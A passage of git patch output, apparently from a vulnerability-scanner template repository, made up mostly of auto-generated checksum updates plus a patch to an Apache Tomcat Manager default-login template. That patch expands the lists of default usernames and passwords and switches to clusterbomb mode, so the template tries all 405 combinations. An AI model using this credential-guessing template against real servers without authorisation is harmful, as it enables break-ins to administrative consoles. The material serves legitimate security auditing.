-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6588,7 +6587,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:9f51ee0fd65558213675767dc833388e1524950d +templates-checksum.txt:e8095e5a4b728faaaa251efc6df6800865d48bb6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From b262a7d62a494917ee91086dab5e02f51730334c Mon Sep 17 00:00:00 2001 From: Nybble04 <36155956+nybble04@users.noreply.github.com> Date: Tue, 11 Jul 2023 16:25:45 +0400 Subject: [PATCH 606/609] Update payloads and attack type --- .../apache/tomcat-default-login.yaml | 65 ++++++++++--------- 1 file changed, 36 insertions(+), 29 deletions(-) diff --git a/http/default-logins/apache/tomcat-default-login.yaml b/http/default-logins/apache/tomcat-default-login.yaml index ff38e73284..1295628249 100644 --- a/http/default-logins/apache/tomcat-default-login.yaml +++ b/http/default-logins/apache/tomcat-default-login.yaml @@ -2,11 +2,12 @@ id: tomcat-default-login info: name: Apache Tomcat Manager Default Login - author: pdteam,sinKettu + author: pdteam,sinKettu,nybble04 severity: high description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. reference: - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ + - https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt metadata: max-request: 18 shodan-query: title:"Apache Tomcat" @@ -21,46 +22,52 @@ http: payloads: username: - - tomcat - - admin - - ovwebusr - - j2deployer - - cxsdk - ADMIN - - xampp - - tomcat - QCC - admin - - root - - role1 - - role - - tomcat - - admin - - role1 - both - - admin + - cxsdk + - demo + - j2deployer + - manager + - ovwebusr + - role + - role1 + - root + - server_admin + - tomcat + - xampp password: - - tomcat - - admin + - ADMIN - OvW*busr1 + - Password1 + - QLogic66 + - admanager + - admin + - adrole1 + - adroot + - ads3cret + - adtomcat + - advagrant + - changethis + - demo - j2deployer - kdsxc - - ADMIN - - xampp - - s3cret - - QLogic66 - - tomcat - - root + - manager + - owaspbwa + - password + - password1 + - r00t - role1 - - changethis - - changethis - - j5Brn9 + - root + - s3cret - tomcat - - tomcat - - 123456 + - toor + - vagrant + - xampp - attack: pitchfork # Available options: sniper, pitchfork and clusterbomb + attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb matchers-condition: and matchers: From c8234e9b014bf539844ef4d193fbbaaed40f6ca2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jul 2023 12:50:44 +0000 Subject: [PATCH 608/609] Auto Generated Templates Checksum [Tue Jul 11 12:50:44 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 14d9b805cb..82cf902ace 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2387,7 +2387,7 @@ http/default-logins/apache/dubbo-admin-default-login.yaml:74b5136c4f11ebd00b9739 http/default-logins/apache/kafka-center-default-login.yaml:1b557a78ea8dc178c711dcb146500dc60f9f9d70 http/default-logins/apache/karaf-default-login.yaml:25ae62abaf6665fca1593b8b974d7394cad62a4a http/default-logins/apache/ranger-default-login.yaml:03c0cbaa1079729b5d5b6ae4f68b81587d88bcda -http/default-logins/apache/tomcat-default-login.yaml:854f215fd90a6deb0aa33f0aac4f7585a8e007d8 +http/default-logins/apache/tomcat-default-login.yaml:215f8a1978aca3ffcaffa4f12d92b064459e14ba http/default-logins/apache/tomcat-examples-login.yaml:bc24cce80923b1cd1732c5142b50bfc2a2d109b3 http/default-logins/apollo/apollo-default-login.yaml:e29e9d074df0b3924a5acfc795fc679bb54d4d49 http/default-logins/arl/arl-default-login.yaml:f449491ecb49f6eb89f974ecdf686ac041592b3e @@ -6587,7 +6587,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:e8095e5a4b728faaaa251efc6df6800865d48bb6 +templates-checksum.txt:418943b11594b7104f9aaa25c010ca28ddac168f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 55d7f7cb96dc4df9ce5a89d3888202733d8fc819 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jul 2023 12:52:04 +0000 Subject: [PATCH 609/609] TemplateMan Update [Tue Jul 11 12:52:04 UTC 2023] :robot: --- http/default-logins/apache/tomcat-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/default-logins/apache/tomcat-default-login.yaml b/http/default-logins/apache/tomcat-default-login.yaml index 1295628249..ed67156987 100644 --- a/http/default-logins/apache/tomcat-default-login.yaml +++ b/http/default-logins/apache/tomcat-default-login.yaml @@ -9,7 +9,7 @@ info: - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ - https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt metadata: - max-request: 18 + max-request: 405 shodan-query: title:"Apache Tomcat" tags: tomcat,apache,default-login